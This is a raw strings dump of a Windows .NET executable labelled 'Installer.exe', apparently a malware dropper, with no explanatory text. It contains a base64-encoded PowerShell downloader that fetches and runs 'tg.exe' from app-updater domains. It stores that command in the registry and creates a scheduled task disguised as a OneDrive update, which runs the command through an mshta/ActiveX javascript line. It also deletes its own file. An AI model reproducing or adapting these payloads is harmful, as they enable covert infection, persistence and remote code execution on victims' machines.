!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
_VtblGap1_30
TASK_TRIGGER_CUSTOM_TRIGGER_01
_VtblGap1_1
_VtblGap2_1
Microsoft.Win32
_TASK_TRIGGER_TYPE2
_VtblGap1_2
_VtblGap2_2
_VtblGap1_3
_VtblGap2_4
_VtblGap1_5
get_UTF8
_VtblGap2_8
<Module>
TASK_ACTION_EXEC
GetTypeFromCLSID
TASK_LOGON_PASSWORD
TASK_LOGON_INTERACTIVE_TOKEN_OR_PASSWORD
TASK_ACTION_SHOW_MESSAGE
TASK_TRIGGER_SESSION_STATE_CHANGE
TASK_TRIGGER_IDLE
TASK_TRIGGER_TIME
TASK_LOGON_NONE
_TASK_LOGON_TYPE
_TASK_ACTION_TYPE
TASK_ACTION_SEND_EMAIL
TASK_LOGON_INTERACTIVE_TOKEN
TASK_TRIGGER_LOGON
TASK_TRIGGER_REGISTRATION
System.IO
TASK_LOGON_GROUP
TASK_ACTION_COM_HANDLER
TASK_TRIGGER_EVENT
TASK_LOGON_SERVICE_ACCOUNT
TASK_TRIGGER_BOOT
TASK_LOGON_S4U
TASK_TRIGGER_MONTHLYDOW
TASK_TRIGGER_MONTHLY
TASK_TRIGGER_DAILY
TASK_TRIGGER_WEEKLY
value__
mscorlib
UserId
ReadToEnd
password
ITaskService
CreateInstance
IEnumerable
IDisposable
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_FileName
set_FileName
serverName
DateTime
LogonType
Dispose
Create
DispIdAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
TypeIdentifierAttribute
CompilationRelaxationsAttribute
CoClassAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
SetValue
Installer.exe
Encoding
System.Runtime.Versioning
FromBase64String
ToString
GetString
Missing
get_Path
set_Path
IRegisteredTask
NewTask
get_Interval
set_Interval
pInterval
Program
System
get_Hidden
set_Hidden
pHidden
domain
get_Duration
set_Duration
pDuration
IAction
IExecAction
System.Reflection
IActionCollection
ITriggerCollection
ITaskDefinition
RegisterTaskDefinition
pDefinition
get_Repetition
set_Repetition
Exception
IRepetitionPattern
ProcessStartInfo
StreamReader
TextReader
ITaskFolder
GetFolder
ITrigger
ITimeTrigger
Installer
TaskScheduler
CurrentUser
get_TargetServer
get_StandardError
set_RedirectStandardError
Activator
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
get_Settings
set_Settings
ITaskSettings
ppSettings
get_Actions
set_Actions
ppActions
System.Collections
get_Triggers
set_Triggers
ppTriggers
GetCurrentProcess
get_Arguments
set_Arguments
Concat
ppRepeat
Object
Connect
WaitForExit
Environment
pArgument
pStart
Convert
get_StandardOutput
set_RedirectStandardOutput
System.Text
get_Now
set_CreateNoWindow
CreateSubKey
RegistryKey
DeleteCurrentFileStealthily
get_StartBoundary
set_StartBoundary
Registry
WrapNonExceptionThrows
Installer
Copyright
2025
$1a2f9219-f2e4-43ad-8a40-a59aba5b0520
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
$BAE54997-48B1-4CBE-9965-D6BE263EBEA4
$02820E19-7B98-4ED2-B2E8-FDCCCEFF619B
$4C3D624D-FD6B-49A3-B9B7-09CB3CD3F047
$9C86F320-DEE3-4DD1-B972-A303F26B061E
$7FB9ACF1-26BE-400E-85B5-294B9C75DFD6
$F5BC8FC5-536D-4F77-B852-FBC1356FDEB6
$8CFAC062-A080-4C15-9A88-AA7C2AF80DFC
TargetServer
$2FABA4C7-4DA9-4013-9697-20CC3FD40F85
$8FD4711D-2D02-4C8C-87E3-EFF699DE127E
$B45747E0-EBA7-4276-9F29-85C5BB300006
$09941815-EA89-4B5B-89E0-2A773801FAC3
$85DF5081-1B24-4F32-878A-D9D14DF4CB77
ZSystem.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
$e34cb9f1-c7f7-424c-be29-027dcc09363a TaskScheduler._TASK_ACTION_TYPE
$e34cb9f1-c7f7-424c-be29-027dcc09363a
TaskScheduler._TASK_LOGON_TYPE
$e34cb9f1-c7f7-424c-be29-027dcc09363a!TaskScheduler._TASK_TRIGGER_TYPE2
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Software\MySoftware
MyCommand
JGFwPSIvYXBpL2dldEZpbGU/Zm49dGcuZXhlIjskYj0kbnVsbDtmb3JlYWNoKCRpIGluIDAuLjEwMDAwKXskcz1pZigkaS1ndCAwKXskaX1lbHNleyIifTskZD0iaHR0cHM6Ly9hcHAtdXBkYXRlciRzLmFwcCRhcCI7JGI9KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWREYXRhKCRkKTtpZigkYil7YnJlYWt9fTtpZihbUnVudGltZS5JbnRlcm9wU2VydmljZXMuUnVudGltZUVudmlyb25tZW50XTo6R2V0U3lzdGVtVmVyc2lvbigpIC1tYXRjaCJedjIiKXtbSU8uRmlsZV06OldyaXRlQWxsQnl0ZXMoIiRlbnY6VVNFUlBST0ZJTEVcTXVzaWNcMS5leGUiLCRiKTtTdGFydC1Qcm9jZXNzICIkZW52OlVTRVJQUk9GSUxFXE11c2ljXDEuZXhlIiAtTm9OZXdXaW5kb3d9ZWxzZXsoW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiKSkuRW50cnlQb2ludC5JbnZva2UoJG51bGwsJG51bGwpfQ==
0F87369F-A4E5-4CFC-BD3E-73E6154572DD
OneDrive Per-Machine Standalone Update Task2
yyyy-MM-ddTHH:mm:ss
P9999D
"javascript:new ActiveXObject('Shell.Application').ShellExecute('powershell', '-Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'SW52b2tlLUV4cHJlc3Npb24gKChHZXQtSXRlbVByb3BlcnR5ICJIS0NVOlxTb2Z0d2FyZVxNeVNvZnR3YXJlIikuTXlDb21tYW5kKQ==\')))', '', '', 0);close();"
/Run /TN "
schtasks.exe
/C timeout 1 && del "
cmd.exe
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Installer
FileVersion
1.0.0.0
InternalName
Installer.exe
LegalCopyright
Copyright
2025
LegalTrademarks
OriginalFilename
Installer.exe
ProductName
Installer
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0